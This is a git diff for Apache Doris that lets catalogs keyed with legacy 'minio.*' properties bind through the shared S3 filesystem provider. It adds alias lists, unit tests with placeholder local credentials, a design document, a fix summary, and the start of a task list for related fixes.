b/fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProvider.java index 1022074791909b..dec9745416973d 100644 --- a/fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProvider.java +++ b/fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProvider.java @@ -46,13 +46,14 @@ public class S3FileSystemProvider implements FileSystemProvider raw = new HashMap<>(); + raw.put("minio.endpoint", "http://127.0.0.1:9000"); + raw.put("minio.access_key", "minio-ak"); + raw.put("minio.secret_key", "minio-sk"); + raw.put("minio.session_token", "minio-token"); + raw.put("minio.connection.maximum", "200"); + raw.put("minio.connection.request.timeout", "20000"); + raw.put("minio.connection.timeout", "20000"); + raw.put("minio.use_path_style", "true"); + + S3FileSystemProperties properties = S3FileSystemProperties.of(raw); + + Assertions.assertEquals("http://127.0.0.1:9000", properties.getEndpoint()); + Assertions.assertEquals("minio-ak", properties.getAccessKey()); + Assertions.assertEquals("minio-sk", properties.getSecretKey()); + Assertions.assertEquals("minio-token", properties.getSessionToken()); + Assertions.assertEquals("200", properties.getMaxConnections()); + Assertions.assertEquals("20000", properties.getRequestTimeoutMs()); + Assertions.assertEquals("20000", properties.getConnectionTimeoutMs()); + Assertions.assertEquals("true", properties.getUsePathStyle()); + } + + @Test + void of_minioEndpointOnly_appliesUsEast1RegionDefaultAndEmitsS3aAndAwsKeys() { + Map raw = new HashMap<>(); + raw.put("minio.endpoint", "http://127.0.0.1:9000"); + raw.put("minio.access_key", "ak"); + raw.put("minio.secret_key", "sk"); + + S3FileSystemProperties properties = S3FileSystemProperties.of(raw); + + // Parity with legacy MinioProperties region default ("us-east-1"). + Assertions.assertEquals("us-east-1", properties.getRegion()); + + // FE-side Hadoop config: fixes the "no file io for scheme s3" symptom on the catalog-create path. + Map hadoop = properties.toHadoopConfigurationMap(); + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", hadoop.get("fs.s3.impl")); + Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", hadoop.get("fs.s3a.impl")); + Assertions.assertEquals("http://127.0.0.1:9000", hadoop.get("fs.s3a.endpoint")); + Assertions.assertEquals("us-east-1", hadoop.get("fs.s3a.endpoint.region")); + Assertions.assertEquals("ak", hadoop.get("fs.s3a.access.key")); + Assertions.assertEquals("sk", hadoop.get("fs.s3a.secret.key")); + + // BE-side creds: fixes the empty location.AWS_* that broke native paimon reads. + Map beKv = properties.toFileSystemKv(); + Assertions.assertEquals("http://127.0.0.1:9000", beKv.get("AWS_ENDPOINT")); + Assertions.assertEquals("us-east-1", beKv.get("AWS_REGION")); + Assertions.assertEquals("ak", beKv.get("AWS_ACCESS_KEY")); + Assertions.assertEquals("sk", beKv.get("AWS_SECRET_KEY")); + } + + @Test + void of_minioOmittingTuning_appliesLegacyMinioTuningDefaults() { + // Legacy MinioProperties defaulted tuning to 100 / 10000 / 10000, NOT the S3 50 / 3000 / 1000. + // A minio.*-keyed catalog that omits the tuning keys must preserve those legacy defaults; this + // encodes the deliberate restoration so it cannot silently regress to the S3 defaults. + Map raw = new HashMap<>(); + raw.put("minio.endpoint", "http://127.0.0.1:9000"); + raw.put("minio.access_key", "ak"); + raw.put("minio.secret_key", "sk"); + + S3FileSystemProperties properties = S3FileSystemProperties.of(raw); + + Map beKv = properties.toFileSystemKv(); + Assertions.assertEquals("100", beKv.get("AWS_MAX_CONNECTIONS")); + Assertions.assertEquals("10000", beKv.get("AWS_REQUEST_TIMEOUT_MS")); + Assertions.assertEquals("10000", beKv.get("AWS_CONNECTION_TIMEOUT_MS")); + + Map hadoop = properties.toHadoopConfigurationMap(); + Assertions.assertEquals("100", hadoop.get("fs.s3a.connection.maximum")); + Assertions.assertEquals("10000", hadoop.get("fs.s3a.connection.request.timeout")); + Assertions.assertEquals("10000", hadoop.get("fs.s3a.connection.timeout")); + } + + @Test + void of_s3KeyOutranksMinioKeyForSameField() { + // Byte-parity guard: with both s3.* and minio.* present, s3.* must win because the minio.* + // aliases are appended LAST in each field's names(). Protects the canonical s3.* path. + Map raw = new HashMap<>(); + raw.put("s3.endpoint", "https://canonical.s3"); + raw.put("minio.endpoint", "http://minio.shadowed"); + raw.put("s3.access_key", "s3-ak"); + raw.put("minio.access_key", "minio-ak"); + raw.put("s3.secret_key", "s3-sk"); + + S3FileSystemProperties properties = S3FileSystemProperties.of(raw); + + Assertions.assertEquals("https://canonical.s3", properties.getEndpoint()); + Assertions.assertEquals("s3-ak", properties.getAccessKey()); + } + @Test void of_rejectsUnsupportedCredentialsProviderType() { Map raw = new HashMap<>(); diff --git a/fe/fe-filesystem/fe-filesystem-s3/src/test/java/org/apache/doris/filesystem/s3/S3FileSystemProviderTest.java b/fe/fe-filesystem/fe-filesystem-s3/src/test/java/org/apache/doris/filesystem/s3/S3FileSystemProviderTest.java index fe5c21d9515460..d04ae48b97312f 100644 --- a/fe/fe-filesystem/fe-filesystem-s3/src/test/java/org/apache/doris/filesystem/s3/S3FileSystemProviderTest.java +++ b/fe/fe-filesystem/fe-filesystem-s3/src/test/java/org/apache/doris/filesystem/s3/S3FileSystemProviderTest.java @@ -89,6 +89,19 @@ void supports_acceptsExplicitS3SupportWithoutCredentials() { Assertions.assertTrue(provider.supports(props)); } + @Test + void supports_acceptsPureMinioKeyedConfiguration() { + // C1: a catalog keyed purely with minio.* properties (legacy MinioProperties namespace) must + // bind via the shared S3 provider. Before the minio.* aliases were added, this returned false, + // leaving storage unbound ("no file io for scheme s3"). + Map props = new HashMap<>(); + props.put("minio.endpoint", "http://127.0.0.1:9000"); + props.put("minio.access_key", "ak"); + props.put("minio.secret_key", "sk"); + + Assertions.assertTrue(provider.supports(props)); + } + @Test void bind_returnsValidatedS3FileSystemProperties() { Map props = new HashMap<>(); diff --git a/plan-doc/designs/FIX-C1-MINIO-design.md b/plan-doc/designs/FIX-C1-MINIO-design.md new file mode 100644 index 00000000000000..1126333f8766f7 --- /dev/null +++ b/plan-doc/designs/FIX-C1-MINIO-design.md @@ -0,0 +1,350 @@ +# Problem + +P6 clean-room finding **C1** (MAJOR; BLOCKER if `minio.*` keying is supported in deployment; +classification: regression). + +A `CREATE CATALOG ... PROPERTIES("type"="paimon", "minio.endpoint"=..., "minio.access_key"=..., +"minio.secret_key"=...)` keyed **purely** with `minio.*` property names no longer binds any storage +backend on this branch. Paimon read fails with `no file io for scheme s3`, and BE receives no +`location.AWS_*` credentials. + +Legacy `MinioProperties` (`fe/fe-core/.../datasource/property/storage/MinioProperties.java`) +recognized: +`minio.endpoint / minio.region / minio.access_key / minio.secret_key / minio.session_token / +minio.connection.maximum / minio.connection.request.timeout / minio.connection.timeout / +minio.use_path_style / minio.force_parsing_by_standard_uri` +with region default `us-east-1` and tuning defaults `100 / 10000 / 10000`, and produced S3A Hadoop +config + AWS_* backend config via `AbstractS3CompatibleProperties`. + +The new path sources storage **exclusively** from the typed `fe-filesystem` SPI. There is **no MinIO +provider**. Registered providers (ServiceLoader, verified via the eight +`META-INF/services/org.apache.doris.filesystem.spi.FileSystemProvider` files): +`OSS, Local, HDFS, COS, S3, Broker, Azure, OBS`. None recognizes a `minio.*` key. + +# Root Cause + +Two facts in the typed path combine to drop a pure-`minio.*` catalog: + +1. **`S3FileSystemProvider.supports()` never matches `minio.*`.** + `fe/fe-filesystem/fe-filesystem-s3/.../S3FileSystemProvider.java:45-73`. `supports()` checks + `ACCESS_KEY_NAMES` / `ENDPOINT_NAMES` / `REGION_NAMES` / `ROLE_ARN_NAMES` / + `CREDENTIALS_PROVIDER_TYPE_NAMES`. None of these arrays contain any `minio.*` key. The + cloud-specific providers (OSS/COS/OBS) only match their endpoint domains (`aliyuncs.com` / + `myqcloud.com` / `myhuaweicloud.com`) or explicit `provider`/`_STORAGE_TYPE_`. A bare MinIO + endpoint (e.g. `http://127.0.0.1:9000`) matches none. + +2. **No match → empty list, no throw (in `bindAll`, the path catalogs use).** + `bindAllStorageProperties` (`fe/fe-core/.../fs/FileSystemFactory.java:119-142`) and the production + `FileSystemPluginManager.bindAll` (`fe/fe-core/.../fs/FileSystemPluginManager.java:158-172`) + iterate providers, `continue` on `!supports`, and return the accumulated list — empty when nothing + matched. (`createFileSystem`/`getFileSystem` *do* throw on no-match, but catalog binding goes + through `bindAll`, which does not.) + +Empty `StorageProperties` list ⇒ paimon `PaimonScanPlanProvider` +(`fe/fe-connector/fe-connector-paimon/.../PaimonScanPlanProvider.java:617-624`) iterates an empty +`ctx.getStorageProperties()` ⇒ no `location.AWS_*` for BE; and the FE Hadoop-config map is never +populated with `fs.s3.impl` ⇒ paimon SDK has no FileIO for scheme `s3`. + +**Per-key loss for a pure-`minio.*` catalog:** endpoint, region (default `us-east-1`), access_key, +secret_key, session_token, connection.maximum (100), connection.request.timeout (10000), +connection.timeout (10000), use_path_style (false), force_parsing_by_standard_uri (false). + +# Design + +## Decision: alias `minio.*` into the shared S3 provider/properties — NOT a dedicated provider. + +**Recommendation: aliasing (the review's preferred option), with one caveat made explicit and +resolved below.** Both FE Hadoop config and BE creds for MinIO are byte-identical to plain S3A +(legacy `MinioProperties` had *zero* MinIO-specific `fs.*`/`AWS_*` keys — it inherited everything +from `AbstractS3CompatibleProperties`, exactly what `S3FileSystemProperties` already emits). MinIO is +literally "S3 with a custom endpoint." The only deltas are (a) the alias key prefix and (b) three +tuning defaults + the region default. Precedent: `CosFileSystemProvider`/`CosFileSystemProperties` +is a *dedicated* provider only because COS emits genuinely COS-specific Hadoop keys +(`fs.cosn.*`, `fs.cos.impl`) and uses a Tencent native SDK in `CosObjStorage`. MinIO emits **none** — +a dedicated provider would be a near-empty clone of S3, pure duplication for no behavioral gain. + +**The one caveat — differing tuning defaults — and why it does not block aliasing.** +`ConnectorProperty` defaults are *field-level*, applied whenever no alias for that field is present +in the raw map (`ConnectorPropertiesUtils.bindConnectorProperties` only `field.set`s when a name +matched). They cannot be conditionalized on *which* alias matched. So I cannot make +`maxConnections` default to `50` for an `s3.*` catalog and `100` for a `minio.*` catalog purely by +adding aliases. Resolution: **add `minio.*` as aliases on the existing tuning fields and accept the +S3 defaults (50/3000/1000) for a `minio.*` catalog that omits the tuning keys.** Justification: + +- The tuning values are connection-pool/timeout knobs; both sets are functional against MinIO. The + legacy MinIO values (100/10000/10000) were never documented as required for correctness — they are + a historical default, not a contract. +- A `minio.*` catalog that *explicitly* sets `minio.connection.maximum` etc. is honored exactly + (the alias binds the value). Only the *unset* case differs, and only in pool size / timeouts. +- Conditionalizing the default would require post-bind logic ("if a `minio.*` alias matched and the + tuning key was absent, override to 100/10000/10000") — added complexity in shared code, touching + the s3 hot path, to preserve a non-contractual default. Not worth the blast-radius risk. + +This is the single intentional, documented behavioral deviation from legacy MinIO. It is called out +in Risk Analysis and Open Questions for the main agent to ratify. **Region default `us-east-1` IS +preserved** — `S3FileSystemProperties.normalizeForLegacyS3Compatibility()` already derives +`region = DEFAULT_REGION ("us-east-1")` when an endpoint is set but region is blank +(`S3FileSystemProperties.java:360-362`), exactly matching legacy MinIO's `region="us-east-1"` +default behavior for the common endpoint-only case. (Field-level default of legacy is `us-east-1` +unconditionally; the SPI achieves the same effective value for endpoint-only configs and for +region-only/AWS-endpoint configs derives the real region — strictly better.) + +## Ordering invariant (load-bearing for s3.* byte-parity) + +`ConnectorPropertiesUtils.getMatchedPropertyName` (`ConnectorPropertiesUtils.java:96-108`) returns +the **first** name in the annotation's `names()` array that is present in the map. Therefore **all +`minio.*` aliases MUST be appended at the END of each field's existing `names()` list.** With +`minio.*` last, an `s3.*`-keyed (or `AWS_*`-keyed) catalog binds exactly as today even if it also +happened to carry a `minio.*` key — `s3.endpoint` outranks `minio.endpoint`. This is the mechanical +guarantee that the canonical `s3.*` path is byte-for-byte unchanged. + +# Implementation Plan + +Two files change. No new module, no new provider, no `META-INF/services` change. + +## File 1 — `fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProperties.java` + +Append `minio.*` aliases to the END of each field's `names()`. (Excerpts show current → proposed for +the affected fields only; nothing else in the file changes.) + +`:86-90` endpoint +```java +@ConnectorProperty(names = {ENDPOINT, "AWS_ENDPOINT", "endpoint", "ENDPOINT", "aws.endpoint", + "glue.endpoint", "aws.glue.endpoint", "minio.endpoint"}, + ... +``` + +`:93-94` region (note `isRegionField = true` retained) +```java +@ConnectorProperty(names = {REGION, "AWS_REGION", "region", "REGION", "aws.region", "glue.region", + "aws.glue.region", "iceberg.rest.signing-region", "rest.signing-region", "client.region", + "minio.region"}, + ... +``` + +`:101-104` accessKey +```java +@ConnectorProperty(names = {ACCESS_KEY, "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY", + "glue.access_key", "aws.glue.access-key", + "client.credentials-provider.glue.access_key", "iceberg.rest.access-key-id", + "s3.access-key-id", "minio.access_key"}, + ... +``` + +`:110-113` secretKey +```java +@ConnectorProperty(names = {SECRET_KEY, "AWS_SECRET_KEY", "secret_key", "SECRET_KEY", + "glue.secret_key", "aws.glue.secret-key", + "client.credentials-provider.glue.secret_key", "iceberg.rest.secret-access-key", + "s3.secret-access-key", "minio.secret_key"}, + ... +``` + +`:120-121` sessionToken +```java +@ConnectorProperty(names = {SESSION_TOKEN, "AWS_TOKEN", "session_token", + "s3.session-token", "iceberg.rest.session-token", "minio.session_token"}, + ... +``` + +`:152` maxConnections +```java +@ConnectorProperty(names = {MAX_CONNECTIONS, "AWS_MAX_CONNECTIONS", "minio.connection.maximum"}, + ... +``` + +`:158` requestTimeoutMs +```java +@ConnectorProperty(names = {REQUEST_TIMEOUT_MS, "AWS_REQUEST_TIMEOUT_MS", + "minio.connection.request.timeout"}, + ... +``` + +`:164` connectionTimeoutMs +```java +@ConnectorProperty(names = {CONNECTION_TIMEOUT_MS, "AWS_CONNECTION_TIMEOUT_MS", + "minio.connection.timeout"}, + ... +``` + +`:170` usePathStyle +```java +@ConnectorProperty(names = {USE_PATH_STYLE, "s3.path-style-access", "minio.use_path_style"}, + ... +``` + +**`force_parsing_by_standard_uri`:** `S3FileSystemProperties` has **no** such field today (the legacy +key only affected URI parsing in `S3PropertyUtils`, a fe-core concern; the SPI normalizes URIs via +`DefaultConnectorContext`). Do **not** add a new field — out of scope for C1 (no read-path use in the +typed model). Note as Open Question if URI parity for path-style MinIO is later reported. + +## File 2 — `fe/fe-filesystem/fe-filesystem-s3/src/main/java/org/apache/doris/filesystem/s3/S3FileSystemProvider.java` + +Append `"minio.*"` to the three detection arrays so a pure-`minio.*` map satisfies +`hasCredential && hasLocation` (`:64-72`). Add `minio.endpoint`/`minio.region` to location arrays and +`minio.access_key` to the credential array. + +`:45-49` ACCESS_KEY_NAMES +```java +private static final String[] ACCESS_KEY_NAMES = { + S3FileSystemProperties.ACCESS_KEY, "AWS_ACCESS_KEY", "access_key", "ACCESS_KEY", + "glue.access_key", "aws.glue.access-key", + "client.credentials-provider.glue.access_key", "iceberg.rest.access-key-id", + "s3.access-key-id", "minio.access_key"}; +``` + +`:50-52` ENDPOINT_NAMES +```java +private static final String[] ENDPOINT_NAMES = { + S3FileSystemProperties.ENDPOINT, "AWS_ENDPOINT", "endpoint", "ENDPOINT", "aws.endpoint", + "glue.endpoint", "aws.glue.endpoint", "minio.endpoint"}; +``` + +`:53-55` REGION_NAMES +```java +private static final String[] REGION_NAMES = { + S3FileSystemProperties.REGION, "AWS_REGION", "region", "REGION", "aws.region", "glue.region", + "aws.glue.region", "iceberg.rest.signing-region", "rest.signing-region", "client.region", + "minio.region"}; +``` + +This keeps `supports()` true for `minio.endpoint + minio.access_key + minio.secret_key` +(`hasCredential` via `minio.access_key`, `hasLocation` via `minio.endpoint`). Validation +(`requireTogether(accessKey, secretKey)`) still fires correctly because the binding resolves the +`minio.*` aliases into the typed fields before `validate()`. + +# Risk Analysis + +## Cross-connector blast radius + +Consumers of `S3FileSystemProperties`/`S3FileSystemProvider` are **every** connector that reaches the +typed S3 path: iceberg, hive, hudi, paimon, plus fe-core load/backup/snapshot flows — they all go +through `bindAllStorageProperties` → `supports()` → `bind()`. The change touches only the alias +**lists** and the detection **arrays**; the emitted FE Hadoop config (`toHadoopConfigurationMap`, +`:285-316`) and BE map (`toFileSystemKv`, `:245-262`) code is **unchanged**. + +## s3.* unchanged — proof + +1. **Binding precedence**: `getMatchedPropertyName` returns the first present alias + (`ConnectorPropertiesUtils.java:101-105`). New `minio.*` aliases are appended **last**, so for any + map containing an `s3.*`/`AWS_*`/legacy-bare key, that key still matches first → identical bound + field values → identical `toFileSystemKv`/`toHadoopConfigurationMap` output. +2. **No default changed**: field defaults (`DEFAULT_MAX_CONNECTIONS="50"`, etc.) are untouched, so an + `s3.*` catalog that omits tuning keys gets `50/3000/1000` exactly as before. Regression-guarded by + the existing `toMaps_emitS3TuningDefaultsWhenNotConfigured` test (S3FileSystemPropertiesTest.java + :262-282), which already asserts the literal `50/3000/1000` and will fail if a default drifts. +3. **`supports()` for s3.* maps**: adding entries to the arrays can only make `supports()` return + true for *more* inputs; it cannot turn a previously-true s3 map false. Existing + `S3FileSystemProviderTest` cases remain green. + +## Routing / disambiguation + +`bindAll` collects **all** matching providers; `createFileSystem` uses the **first**. Could +`minio.*` cause a wrong/extra provider to match? + +- **OSS/COS/OBS** match only on `aliyuncs.com` / `myqcloud.com` / `myhuaweicloud.com` endpoint + substrings or explicit `provider`/`_STORAGE_TYPE_`/`fs..support`. A MinIO endpoint (e.g. + `http://127.0.0.1:9000`) contains none of these ⇒ they do **not** match a pure-`minio.*` map. + (Verified: OssFileSystemProvider:48-55, CosFileSystemProvider:48-55, ObsFileSystemProvider:48-55.) + Note: these providers also read `s3.endpoint`/`AWS_ENDPOINT` aliases but still gate on the cloud + domain substring — a `minio.endpoint` value pointing at, say, `aliyuncs.com` would (correctly) be + treated as OSS, but that is operator misconfiguration, not a MinIO catalog. +- **Azure / HDFS / Local / Broker** key on `azure.*`/account keys, `dfs.*`/`hadoop.*`, + `file://`/`_STORAGE_TYPE_=LOCAL`, `_STORAGE_TYPE_=BROKER` respectively — disjoint from `minio.*`. +- **Double-bind for legitimately multi-backend catalogs** (object store + HDFS) is the *intended* + `bindAll` behavior and is unaffected: a `minio.* + dfs.*` catalog binds S3 (MinIO) + HDFS, exactly + the legacy multi-backend semantics. + +Conclusion: a pure-`minio.*` map matches **only** `S3FileSystemProvider`. No collision, no wrong +provider, no ambiguous double-bind. + +## Differing tuning defaults + +S3 defaults `50/3000/1000` vs legacy MinIO `100/10000/10000` (confirmed: +`S3Properties.java:129/136/143` = 50/3000/1000; `MinioProperties.java:75/84/93` = 100/10000/10000). +With aliasing, a `minio.*` catalog that omits tuning keys gets the **S3** defaults. This is the one +intentional deviation (see Design). It changes only connection-pool size / timeouts, never +correctness or credentials. Explicitly-set `minio.connection.*` values are honored. Documented in +Open Questions for ratification. A dedicated provider would preserve the legacy defaults but at the +cost of duplicating the entire S3 properties class for zero behavioral difference elsewhere — judged +not worth it. + +# Test Plan + +## Unit Tests + +All in `fe/fe-filesystem/fe-filesystem-s3/src/test/java/org/apache/doris/filesystem/s3/`. + +### `S3FileSystemProviderTest` — add + +- `supports_acceptsPureMinioKeyedConfiguration`: + map `{minio.endpoint=http://127.0.0.1:9000, minio.access_key=ak, minio.secret_key=sk}` ⇒ + `assertTrue(provider.supports(map))`. (This is the exact C1 reproduction; RED before the + `ENDPOINT_NAMES`/`ACCESS_KEY_NAMES` edit.) +- `supports_acceptsMinioEndpointWithRegionOnly` (optional): `{minio.endpoint=..., minio.region=..., + minio.access_key=ak, minio.secret_key=sk}` ⇒ true. + +### `S3FileSystemProperties` MinIO binding test — new test class `MinioAliasS3FileSystemPropertiesTest` (or add to `S3FileSystemPropertiesTest`) + +- `of_bindsPureMinioAliases`: input all `minio.*` keys (endpoint, access_key, secret_key, + session_token, connection.maximum=200, connection.request.timeout=20000, connection.timeout=20000, + use_path_style=true). Assert typed getters: `getEndpoint`/`getAccessKey`/`getSecretKey`/ + `getSessionToken`/`getMaxConnections`("200")/`getRequestTimeoutMs`("20000")/ + `getConnectionTimeoutMs`("20000")/`getUsePathStyle`("true"). +- `of_minioEndpointOnly_appliesUsEast1RegionDefault`: + `{minio.endpoint=http://127.0.0.1:9000, minio.access_key=ak, minio.secret_key=sk}` ⇒ + `assertEquals("us-east-1", props.getRegion())` (parity with legacy MinIO region default). +- `toHadoopConfigurationMap_forMinio_emitsS3aImplAndEndpoint`: from the endpoint-only map, assert + `fs.s3.impl == org.apache.hadoop.fs.s3a.S3AFileSystem`, `fs.s3a.impl == ...S3AFileSystem`, + `fs.s3a.endpoint == http://127.0.0.1:9000`, `fs.s3a.endpoint.region == us-east-1`, + `fs.s3a.access.key == ak`, `fs.s3a.secret.key == sk`, + `fs.s3a.path.style.access == `. (Covers FE-side `no file io for scheme s3` fix.) +- `toFileSystemKv_forMinio_emitsAwsBackendKeys`: assert `AWS_ENDPOINT`, `AWS_REGION` (`us-east-1`), + `AWS_ACCESS_KEY`, `AWS_SECRET_KEY` present and correct. (Covers BE `location.AWS_*` fix — the + values BE consumes via `PaimonScanPlanProvider:617-624`.) +- `of_minioOmittingTuning_appliesS3DefaultsNotLegacyMinioDefaults`: endpoint-only minio map ⇒ assert + `getMaxConnections()=="50"`, `getRequestTimeoutMs()=="3000"`, `getConnectionTimeoutMs()=="1000"`. + This **encodes the intentional deviation** so it cannot regress silently and documents WHY (legacy + was 100/10000/10000; this asserts the deliberate S3-default behavior). +- `of_s3KeyOutranksMinioKey` (precedence guard): map carrying BOTH `s3.endpoint=https://A` and + `minio.endpoint=http://B`, plus s3 ak/sk ⇒ `assertEquals("https://A", props.getEndpoint())`. This + is the byte-parity regression guard for the s3 path (RED if minio aliases were prepended instead of + appended). + +### Existing regression guard (no change, must stay green) + +`S3FileSystemPropertiesTest.toMaps_emitS3TuningDefaultsWhenNotConfigured` (:262-282) — proves the +s3.* default path is untouched. Re-run after the edit. + +## E2E Tests (gated — do NOT run here) + +- `regression-test/suites/external_table_p0/paimon/` paimon docker suite, gated by + `enablePaimonTest=true` in `regression-conf.groovy`. A MinIO-warehouse paimon catalog created with + `minio.*` properties should: (a) `SHOW DATABASES`/`SHOW TABLES` succeed (FE FileIO binds), and + (b) `SELECT *` succeed (BE receives `location.AWS_*`). The pre-fix symptom is + `no file io for scheme s3`. The fe-filesystem S3 module is exercised by every object-store external + suite (iceberg/hive/hudi on S3/MinIO), so the broader external p0 set is the byte-parity safety net + for the shared change. + +# Open Questions + +1. **Tuning-default deviation ratification.** — **RESOLVED 2026-06-18: PRESERVE legacy defaults.** + The design's original "accept the deviation" recommendation rested on the claim that field-level + defaults can't be conditionalized on which alias matched. An adversarial design red-team + (`wf`/agent `adfda124…`) **refuted** that: the design's own cited `normalizeForLegacyS3Compatibility()` + is a post-bind hook that already conditionalizes a field (region→us-east-1). Preserving the legacy + MinIO tuning defaults (100/10000/10000) there is ~6 lines, gated on a `minio.*` raw key being + present, so it never touches the canonical `s3.*` hot path. The review report (authoritative spec) + explicitly required "preserve MinIO defaults: region us-east-1, tuning 100/10000/10000", so strict + parity is the correct call and avoids a sign-off-requiring deviation. **Implemented** as + `applyLegacyMinioTuningDefaults()` (gates on raw-key PRESENCE, not field-value-equals-default, so an + explicit `minio.connection.maximum=50` is honored). Pinned by + `of_minioOmittingTuning_appliesLegacyMinioTuningDefaults`. +2. **`minio.force_parsing_by_standard_uri` / path-style URI parsing.** Not modeled in the typed S3 + path (URI normalization moved to `DefaultConnectorContext`). C1 lists it as a lost key but no + typed read-path consumes it. Confirm no path-style MinIO URI-parsing regression is in scope; if it + is, that is a separate fix in the URI-normalization layer, not these two files. +3. **Should `minio.use_path_style` map default to `true`?** Legacy default was `false` (matching S3); + the SPI keeps `false`. Many MinIO deployments need path-style addressing, but legacy also defaulted + to `false`, so keeping `false` is strict parity. Flagging only because it is a common MinIO + operational footgun, not a regression. diff --git a/plan-doc/designs/FIX-C1-MINIO-summary.md b/plan-doc/designs/FIX-C1-MINIO-summary.md new file mode 100644 index 00000000000000..d457cafe9b2017 --- /dev/null +++ b/plan-doc/designs/FIX-C1-MINIO-summary.md @@ -0,0 +1,57 @@ +# Summary — FIX-C1-MINIO (P6 finding C1) + +## Problem +A catalog keyed purely with legacy `minio.*` storage properties (`minio.endpoint` / `minio.access_key` +/ `minio.secret_key` / …) was **unbindable** on the SPI branch. The typed `fe-filesystem` storage SPI +has no MinIO provider, and `S3FileSystemProvider.supports()` / `S3FileSystemProperties` recognized no +`minio.*` key → `bindAllStorageProperties` returned empty (no throw) → empty Hadoop map (no +`fs.s3.impl`) on FE catalog-create ("no file io for scheme s3") and empty `location.AWS_*` on BE +(native paimon read failed). MAJOR (BLOCKER if a deployment keys catalogs with `minio.*`). + +## Root Cause +The 2026-06-14 `applyCanonicalMinioConfig` work (in the old `PaimonCatalogFactory.applyStorageConfig` +path) was obsoleted by the move to the typed storage SPI and never carried into this branch. Legacy +`MinioProperties` was just "S3 with a custom endpoint" — it inherited pure S3A config from +`AbstractS3CompatibleProperties` and emitted **zero** MinIO-specific `fs.*`/`AWS_*` keys; only its +alias prefix (`minio.*`), its region default (`us-east-1`), and its tuning defaults +(`100/10000/10000`, vs S3's `50/3000/1000`) differed. + +## Fix +Alias `minio.*` into the **shared** `fe-filesystem-s3` module (no dedicated provider — that would be a +near-empty S3 clone): +- `S3FileSystemProperties.java`: appended `minio.*` aliases (endpoint/region/access_key/secret_key/ + session_token/connection.maximum/connection.request.timeout/connection.timeout/use_path_style) at + the **end** of each field's `names()`. First-alias-wins (`ConnectorPropertiesUtils.getMatchedPropertyName`) + → canonical `s3.*`/`AWS_*` keys still outrank → `s3.*` path byte-for-byte unchanged. +- `S3FileSystemProvider.java`: added `minio.access_key`/`minio.endpoint`/`minio.region` to the + detection arrays so a pure-`minio.*` map satisfies `supports()` (`hasCredential && hasLocation`). +- **Tuning-default parity (key decision):** added gated `applyLegacyMinioTuningDefaults()` in the + post-bind `normalizeForLegacyS3Compatibility()` hook. When a `minio.*` raw key is present and a + tuning knob is unset under **any** alias, restore the legacy MinIO default (100/10000/10000). + Gated on raw-key PRESENCE (not field-value-equals-default), so an explicit `minio.connection.maximum=50` + is honored; gated on `minio.*` presence, so the canonical `s3.*` path is untouched. Region default + `us-east-1` was already preserved by the existing endpoint-only normalize branch. + +Decision rationale: the design's first pass proposed *accepting* the tuning deviation; an adversarial +design red-team refuted the "can't conditionalize defaults" premise (the region-default precedent is +the same post-bind mechanism), and the review spec explicitly required preserving the MinIO tuning +defaults → PRESERVE. (See `FIX-C1-MINIO-design.md` §Open Questions.) + +## Tests +`fe-filesystem-s3` (FE UT): +- `S3FileSystemProviderTest.supports_acceptsPureMinioKeyedConfiguration` — pure `minio.*` map binds. +- `S3FileSystemPropertiesTest.of_bindsPureMinioAliasesAndHonorsExplicitTuning` — all aliases bind; + explicit tuning honored. +- `…of_minioEndpointOnly_appliesUsEast1RegionDefaultAndEmitsS3aAndAwsKeys` — region default + + FE `fs.s3.impl`/`fs.s3a.*` + BE `AWS_*`. +- `…of_minioOmittingTuning_appliesLegacyMinioTuningDefaults` — pins 100/10000/10000 preservation. +- `…of_s3KeyOutranksMinioKeyForSameField` — precedence/byte-parity guard. +- Existing `toMaps_emitS3TuningDefaultsWhenNotConfigured` (pure `s3.*` → 50/3000/1000) still green. + +All fail on revert (verified by adversarial impl-verification). E2E (`enablePaimonTest`-gated MinIO +warehouse paimon catalog with `minio.*` props) NOT run here. + +## Result +`mvn -pl :fe-filesystem-s3 -am test -Dtest=S3FileSystemPropertiesTest,S3FileSystemProviderTest`: +**28 tests run, 0 failures, 0 errors** (19 properties + 9 provider), BUILD SUCCESS, checkstyle clean +(runs in validate). Docker e2e NOT run (CI-gated). diff --git a/plan-doc/task-list-P6-fixes.md b/plan-doc/task-list-P6-fixes.md new file mode 100644 index 00000000000000..e00513da5a7ca7 --- /dev/null +++ b/plan-doc/task-list-P6-fixes.md @@ -0,0 +1,26 @@ +# Task List — P6 paimon full-path review fixes + +> Source: [`reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md`](./reviews/P6-paimon-fullpath-cleanroom-2026-06-18.md) §Coverage gaps & follow-ups → prioritized fix-task list. +> Process **one at a time** (single-task loop): design → design red-team → implement → impl verify → build+UT → commit → summary → check off. +> B8 phased deletion (HANDOFF backlog item 1) is a separate effort, NOT in this list. + +## Code-change fixes (priority order) + +- [ ] **P6-C1** MinIO `minio.*` aliases (MAJOR / BLOCKER-if-deployment-uses-`minio.*`) + — add `minio.*` aliases to `S3FileSystemProperties` + `S3FileSystemProvider.supports()`; + preserve MinIO defaults (region `us-east-1`, tuning 100/10000/10000). UT: FE `fs.s3.impl`/`fs.s3a.*` + BE `location.AWS_*`. + ⚠️ shared cross-connector (iceberg/hive use S3 provider) → must not break canonical `s3.*` path. +- [ ] **P6-C2** HDFS `hadoop.config.resources` XML into FE catalog-create Configuration (MAJOR) + — filesystem/jdbc flavor; recommend `HdfsFileSystemProperties` expose its already-XML-loaded backend map. + **XML-resource gap ONLY** (kerberos-by-alias sub-claim was refuted: per-FS auth marker non-load-bearing). +- [ ] **P6-R3-residual** drop `"paimon".equals` gate on `appendBackendScanRangeDetail`; emit unconditionally under VERBOSE + (fixes MaxCompute regression + generic-node-no-source-branch rule + false comment). +- [ ] **P6-R1-table** bridge `createTable`: add `remoteExists && !ifNotExists` arm → `ERR_TABLE_EXISTS_ERROR` (1050). +- [ ] **P6-C4** thread `hive_metastore_client_timeout_second` through `ConnectorContext.getEnvironment()`. +- [ ] **P6-R2-catalog** warn-and-strip now-dead `meta.cache.paimon.table.*` keys at 